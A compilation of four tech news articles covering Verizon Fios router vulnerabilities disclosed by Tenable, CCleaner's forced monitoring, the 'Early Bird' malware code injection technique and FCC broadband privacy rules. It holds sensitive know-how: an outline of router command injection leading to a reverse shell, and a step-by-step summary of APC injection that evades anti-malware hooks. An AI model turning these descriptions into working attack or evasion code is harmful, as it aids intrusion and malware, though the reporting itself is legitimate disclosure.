Researcher Reveals Multiple Flaws in Verizon Fios Routers — PoC Released

A cybersecurity researcher at Tenable has discovered multiple security vulnerabilities in Verizon Fios Quantum Gateway Wi-Fi routers that could allow remote attackers to take complete control over the affected routers, exposing every other device connected to it.
Currently used by millions of consumers in the United States, Verizon Fios Quantum Gateway Wi-Fi routers have been found vulnerable to three security vulnerabilities, identified as CVE-2019-3914, CVE-2019-3915, and CVE-2019-3916.
The flaws in question are authenticated command injection (with root privileges), login replay, and password salt disclosure vulnerabilities in the Verizon Fios Quantum Gateway router (G1100), according to technical details Chris Lyne, a senior research engineer at Tenable, shared with The Hacker News.
Authenticated Command Injection Flaw (CVE-2019-3914)
When reviewing the log file on his router, Chris noticed that the “Access Control” rules in the Firewall settings, available in the router’s web interface, was not properly sanitizing the “hostname” parameter while passing the values as part of a command to the console.
So, it turned out that injecting a malicious input as hostname can manipulate the Firewall command, eventually allowing an attacker to execute arbitrary code on the affected device.
“Notice the iptables command being issued. Clearly, I must have entered tenable [keyword] in here at some point. That got me thinking… I wonder if I can inject an OS command into this,” the researcher said in a blog post.
“Clearly, this has to do with Access Control rules in the Firewall settings. I investigated the web interface to see if I could find tenable anywhere.”
However, it should be noted that to exploit this vulnerability (CVE-2019-3914) the attacker first needs to access the router’s web interface, which itself reduces the attack surface unless the victims are not relying on the default or weak passwords.
hacking router password
Also, affected routers don’t come with remote administration enabled by default, which further reduces the threat of Internet-based attacks.
“There are two attack scenarios that enable an attacker to execute commands remotely. First, the insider threat would allow an attacker to record the login sequence (salted hash) using a packet sniffer. Either through legitimate access (a house guest) or social engineering (customer support scam), an attacker could obtain the target router’s administrator password from the sticker on the router and public IP address. They can then either turn remote administration on, confirm it is enabled, or use the same social engineering ruse to have the victim enable it,” Chris told The Hacker News in an email interview.
“Then, the attacker can exploit CVE-2019-3914 remotely, from across the internet, to gain remote root shell access to the router’s underlying operating system. From here, they have control of the network. They can create back doors, record sensitive internet transactions, pivot to other devices, etc.”

As shown in the video demonstration, since the Verizon router also supports Java because of Embedded JVM (Java Virtual Machine), an attacker can simply upload a Java-based payload to get a reverse shell with root privileges to launch further attacks.
To execute a Java reverse shell, the attacker only needs to upload and run a Java class, as the researcher said, “I accomplished this by programming the HTTP listener to return a Base64-encoded, compiled Java class in the response body. Additionally, the Java code was compiled for the target JVM (Java SE 1.8).”
Login Replay And Password Salt Disclosure Flaws
Besides details and video demonstration, the researcher has also released the proof-of-concept exploit code for this vulnerability.
The second vulnerability, identified as CVE-2019-3915, exists because the web administration interface of router relies on the insecure HTTP connection.
It allows network-based attackers to intercept login requests using a packet sniffer and replay them to gain admin access to the web interface.
The third flaw, identified as CVE-2019-3916, allows an unauthenticated attacker to retrieve the value of the password salt by simply visiting a URL in a web browser.
Since the router firmware does not enforce HTTPS, it is possible for attackers to capture a login request containing salted password hash (SHA-512), which can then be used to recover the plaintext password.
Tenable responsibly reported these vulnerabilities to Verizon, who acknowledged the issues and addressed them in new firmware version 02.02.00.13, which will be applied automatically.
“However, they’ve [Verizon] since advised that they are still working to push auto updates to a small fraction of devices. Users are urged to confirm that their router is updated to version 02.02.00.13, and if not, contact Verizon for more information.”
At the time of writing, a simple Shodan search revealed that nearly 15,000 Verizon Fios Quantum Gateway Wi-Fi routers with remote administration were accessible on the Internet. However, it’s unknown how many of them are running the patched firmware version.

CCleaner Adds Data Collection Feature With No Way to Opt-Out

ccleaner software download Like many others, do you also believe that the popular system-cleaning tool CCleaner was performing well before Avast acquired the software from Piriform last year?
If yes, then pop-up advertisements in the previous CCleaner software version was not the last thing you have to deal with.
Avast has released a new version of CCleaner 5.45 that not only always runs in the background, but also collects information about your system without giving you a way to turn the feature off.
CCleaner is a popular application, available in both free and premium versions, with over 2 billion downloads that allow users to clean up their Windows, Mac, and mobile devices to optimize and enhance performance.
Last year, CCleaner made headlines when it suffered a massive supply-chain malware attack of all times, wherein hackers compromised its servers for over a month and replaced the original version of the software with the malicious one, infecting over 2.3 million users worldwide.
CCleaner Users Concern Over Active Monitoring and User Data Collection
ccleaner software download
This time the system cleaning software is in headlines due to “monitoring and data collection” features Avast added in past few months to your favorite system optimizer application.
Here’s the timeline:
CCleaner 5.43 released in May—removes the option to opt out of data-sharing feature for users of the free software version.
CCleaner 5.44 released in June—adds pop-up advertisements.
CCleaner 5.45 released in July—forces Active Monitoring and heartbeat features.
These monitoring elements of CCleaner send user data such as anonymous system usage data back to the company’s servers, as well as continuously scan systems to inform users when it comes across any junk or browser file, as first reported by Techdows.
What’s concerning is that even after turning off the Active Monitoring feature from CCleaner’s menus, it turns back ON automatically whenever users reboot their computer or close the software.
In its changelog for CCleaner 5.45, Avast notes it “added more detailed reporting for bug fixes and product improvements.”
Besides this, CCleaner now also sends a heartbeat every 12 hours which reports up-to-date usage statistics to Avast, allowing the company to faster deliver bug fixes and product improvements.
When asked about it on its forum, CCleaner said heartbeat sends only “non-personal, absolutely non-identifiable usage information to improve CCleaner.”
Though the information CCleaner gathers is entirely anonymous, users on various internet forums expressed their concerns about Avast data sharing practice, saying that the company ruined their favorite tool after acquiring it.
Moreover, CCleaner’s privacy policy also says that it can share collected information with 3rd party companies.
“We reserve the right to store and use the information collected by our software. We may publish or share that information with third parties that are not part of the Avast Group, but we will only ever do so after anonymizing the data,” CCleaner’s privacy policy says.
“We reserve the right to store and use the information collected by our software and to share such information among the Avast Group to improve our current and future products and services, to help us develop new products and services, and to better understand the behavior of our users.”
Avast Promises to Fix CCleaner Privacy Issues
In response to the users’ complaints about Active Monitoring, Avast said on its forum that the company will offer separate menu items for turning off Active Monitoring and sending anonymous usage data (heartbeat).
“We will separate out Active Monitoring (junk cleaning alerts and browser cleaning alerts), and heartbeat (anonymous usage analytics) features in the UI, and we will give you the ability to control these individually,” the company said.
“We will take this opportunity to rename the Advanced Monitoring features in CCleaner to make their functions clearer.”
Avast said the company will roll out these changes in the coming weeks. So, users are recommended to hold off on upgrading their software to version 5.45 until the new update is available to download.
For those who have already upgraded their software to version 5.45 can disable Active Monitoring by forcefully terminating CCleaner using the Task Manager or third-party process management software for a while until the next version arrives.

Hackers Found Using A New Code Injection Technique to Evade Detection

While performing in-depth analysis of various malware samples, security researchers at Cyberbit found a new code injection technique, dubbed Early Bird, being used by at least three different sophisticated malware that helped attackers evade detection.
As its name suggests, Early Bird is a “simple yet powerful” technique that allows attackers to inject malicious code into a legitimate process before its main thread starts, and thereby avoids detection by Windows hook engines used by most anti-malware products.
The Early Bird code injection technique “loads the malicious code in a very early stage of thread initialization, before many security products place their hooks—which allows the malware to perform its malicious actions without being detected,” the researchers said.
The technique is similar to the AtomBombing code injection technique that does not rely on easy-to-detect API calls, allowing malware to inject code into processes in a manner that no anti-malware tools can detect.

Early Bird code injection method relies on a Windows built-in APC (Asynchronous Procedure Calls) function that allows applications to execute code asynchronously in the context of a particular thread.
Here’s a brief step-by-step explanation of how an attacker can inject malicious code into a legitimate process in a way that it gets executed earlier before an anti-malware program starts scanning.
Create a suspended process of a legitimate Windows process (e.g., svchost.exe)
Allocate memory in that process (svchost.exe) and write the malicious code into the allocated memory region,
Queue an asynchronous procedure call (APC) to the main thread of that process (svchost.exe),
Since APC can execute a process only when it is in an alertable state, call NtTestAlert function to force kernel into executing the malicious code as soon as the main thread resumes.
According to the researchers, at least three following-mentioned malware were found using Early Bird code injection in the wild.
“TurnedUp” backdoor, developed by an Iranian hacking group (APT33)
A variant of “Carberp” banking malware
“DorkBot” malware
Initially discovered by FireEye in September 2017, TurnedUp is a backdoor that is capable of exfiltrating data from the target system, creating reverse shells, taking screenshots as well as gathering system information.
early-bird-malware-code-injection-technique
Dates back to 2012, DorBot is botnet malware distributed via links on social media, instant messaging apps or infected removable media and is used to steal users’ credentials for online services, including banking services, participate in distributed denial-of-service (DDoS) attacks, send spam and deliver other malware to victims’ computers.
Researchers have also provided a video demonstration, which shows the new Early Bird code injection technique in action.

The FCC just passed sweeping new rules to protect your online privacy

Federal regulators have approved unprecedented new rules to ensure broadband providers do not abuse their customers’ app usage and browsing history, mobile location data and other sensitive personal information generated while using the Internet.

The rules, passed Thursday in a 3-to-2 vote by the Federal Communications Commission, require Internet providers, such as Comcast and Verizon, to obtain their customers’ explicit consent before using or sharing that behavioral data with third parties, such as marketing firms.

Also covered by that requirement are health data, financial information, Social Security numbers and the content of emails and other digital messages. The measure allows the FCC to impose the opt-in rule on other types of information in the future, but certain types of data, such as a customer’s IP address and device identifier, are not subject to the opt-in requirement. The rules also force service providers to tell consumers clearly what data they collect and why, as well as to take steps to notify customers of data breaches.

“It’s the consumers’ information,” said FCC Chairman Tom Wheeler. “How it is used should be the consumers’ choice. Not the choice of some corporate algorithm.”

In the near term, what consumers see and experience on the Web is unlikely to change as a result of the rules; targeted advertising has become a staple of the Internet economy and will not be going away. But the regulations may lead to new ways in which consumers can control their Internet providers’ business practices. That could mean dialogue boxes, new websites with updated privacy policies or other means of interaction with companies.

The fresh regulations come as Internet providers race to turn their customers’ behavioral data into opportunities to sell targeted advertising. No longer content to be the conduits to websites, social media and online video, broadband companies increasingly view the information they collect on users as they traverse the Web as a source of revenue in itself.

With its move, the FCC is seeking to bring Internet providers’ conduct in line with that of traditional telephone companies that have historically obeyed strict prohibitions on the unauthorized use or sale of call data.

But the Internet era has brought new challenges, in some cases creating different categories of personal information — and ways to use it — that did not exist in the telephone era. And as the line increasingly blurs between traditional network operators and online content companies, regulators have struggled to keep pace.

For example, Verizon’s acquisition of AOL and potential purchase of Yahoo are both aimed at monetizing Internet usage beyond the straightforward sale of broadband access.

With greater insights into customer behavior, the company could market additional services or content to its wireless subscribers as part of a bundle, policy analysts say. That arrangement could allow Verizon to effectively earn money twice from the same subscriber — once for the data plan, and then again when the customer consumes Verizon-affiliated content.

Although Thursday’s vote by the FCC requires companies, such as Verizon, to obtain explicit permission from consumers when it shares sensitive personal data with outside firms, it does not require broadband providers to ask permission before using the data themselves in certain ways — such as providing broadband service.

For instance, Verizon would be able to use a wireless subscriber’s usage history to recommend purchasing a larger mobile data plan. It could also use the customer’s information to market its home Internet service, Verizon FiOS, even though FiOS is a separate product operated by a different part of the company. In neither case would Verizon have to ask for the subscriber’s affirmative consent.

But Verizon would have to allow consumers the chance to opt out of having their usage history shared with other Verizon businesses that do not sell communications services, such as AOL or Yahoo, according to the rules.

Consumer advocates say it’s a step in the right direction, even if they would have preferred stricter requirements.

“It’s not so far off the mark that it guts the provision,” said Harold Feld, a senior vice president at the consumer advocacy group Public Knowledge. “It still provides sufficient protections for consumers to regard this as a positive step.”

A trade association for the cable industry criticized the regulations Thursday as “profoundly disappointing.”

“Today’s result speaks more to regulatory opportunism than reasoned policy,” said the NCTA — The Internet & Television Association.

The FCC measure also received pushback from Internet providers in the run-up to the vote, over complaints that telecom companies would now be treated differently from websites, such as Google and Facebook, which also use personal data for advertising purposes on a tremendous scale.

“There is no sound reason to subject broadband providers to a different set of rules than other Internet companies,” wrote AT&T in a regulatory filing last week. “This would … deny broadband providers the same opportunity other Internet companies have to participate in the fast-growing digital advertising market.”

But the FCC may have little jurisdiction — or appetite — for regulating the data practices of individual Web companies; Wheeler has repeatedly declined to extend new regulations to the sector.

Republican officials at the FCC opposed the new privacy rules, saying the different expectations for Internet providers and websites will create confusion among consumers.

“If the FCC truly believes that these new rules are necessary to protect consumer privacy, then the government now must move forward to ensure uniform regulation of all companies in the Internet ecosystem at the new baseline the FCC has set,” said FCC Commissioner Ajit Pai, who suggested that the Federal Trade Commission could accomplish the task.

Opponents of the rules have called it an unlawful use of FCC power, setting the stage for a potential lawsuit by the broadband industry to overturn the privacy regulations. Michael O’Rielly, a Republican FCC commissioner, said Thursday that he expects “extensive” legal challenges to the rules.

He also added the rules may have “unintended consequences.” For example, he said, it is unclear how the FCC’s privacy regulations will address a burgeoning Internet of Things — the name for a growing class of connected devices such as thermostats, refrigerators and even automobiles. How Internet providers can use and share the data generated by those appliances will remain an open question, O’Rielly said.

Brian Fung covers technology for The Washington Post